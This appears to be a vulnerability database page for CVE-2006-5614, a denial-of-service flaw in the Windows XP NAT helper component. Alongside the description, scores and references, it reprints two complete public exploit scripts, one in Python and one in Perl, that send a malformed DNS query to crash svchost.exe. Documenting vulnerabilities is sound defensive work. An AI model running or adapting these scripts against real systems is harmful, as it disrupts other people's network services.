CVE-2006-5614 : Detail

CVE-2006-5614

88.35%V4
Network
2006-10-31
00h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2672

Publication date : 2006-10-27 22h00 +00:00
Author : h07
EDB Verified : Yes

#!/usr/bin/python # Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit # Bug discovered by h07 <h07@interia.pl> # Tested on XP SP2 Polish # Details: # # Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] # # [Process svchost.exe, module ipnathlp] # --> MOV DL, [EAX] # Exception C0000005 (ACCESS_VIOLATION reading [00000000]) ## from socket import * from time import sleep host = "192.168.0.1" port = 53 buffer = ( # DNS (query) "\x6c\xb6" # Transaction ID: 0x6cb6 "\x01\x00" # Flags: 0x0100 (Standard query) "\x00\x00" # Questions: 0 "\x00\x00" # Answer RRs: 0 "\x00\x00" # Authority RRs: 0 "\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: www.google.com "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) ) s = socket(AF_INET, SOCK_DGRAM) s.connect((host, port)) s.send(buffer) sleep(1) s.close() # EoF # milw0rm.com [2006-10-28]
Exploit Database EDB-ID : 2682

Publication date : 2006-10-29 23h00 +00:00
Author : x82
EDB Verified : Yes

#!/usr/bin/perl ## ## Microsoft Windows NAT Helper Components Remote DoS Exploit (2) ## ************************************************************** ## ## .details ## -------- ## Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..] ## ## .info ## ----- ## code by x82 <x82_ [at] bk [dot] ru> ## bug by h07 <h07 [at] interia [dot] pl> ## ## .greetz ## ------- ## ... goes out to triple6, wolf, lux2, EaTh, darkkilla, 2letterman .. ;) ## ## use warnings; use diagnostics; use strict; use IO::Socket; my $host = $ARGV[0]; # 192.168.0.1 my $port = 53; # standard port my $payload = # by h07 "\x6c\xb6". "\x01\x00". "\x00\x00". "\x00\x00". "\x00\x00". "\x00\x00". # <-- Bug is here 0x0000 "\x03\x77\x77\x77". "\x06\x67\x6f\x6f". "\x67\x6c\x65\x03". "\x63\x6f\x6d\x00". "\x00\x01". "\x00\x01"; my $length = length($payload); if((! $host || $host !~ /^\d{1,3}(\.\d{1,3}){3}$/)) { print "\n----------------------------------------------------------------------\n"; print "Microsoft Windows NAT Helper Components Remote DoS Exploit\n"; print "exploit by x82 <x82_ [at] bk [dot] ru>\n"; print "bug discovered by h07 <h07 [at] interia [dot] pl>\n"; print "----------------------------------------------------------------------"; print "\n"; print "usage: perl $0 192.168.0.1\n"; exit; } my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port); unless ($socket) { die "[-] Can\'t connect to $host" } print "\n"; print "[+] connection established\n"; print "[*] Sending payload ..." . "(size: $length)\n"; sleep(5); print $socket $payload; print "[+] ok - payload sent\n"; ## 29.10.2006 # milw0rm.com [2006-10-30]

Products Mentioned

Configuraton 0

Microsoft>>Windows_nt_helper_components >> Version *

Configuraton 0

Microsoft>>Windows_xp >> Version *

References

http://secunia.com/advisories/22592
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/20804
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/2672
Tags : exploit, x_refsource_EXPLOIT-DB
http://securitytracker.com/id?1017133
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/4248
Tags : vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/30096
Tags : vdb-entry, x_refsource_OSVDB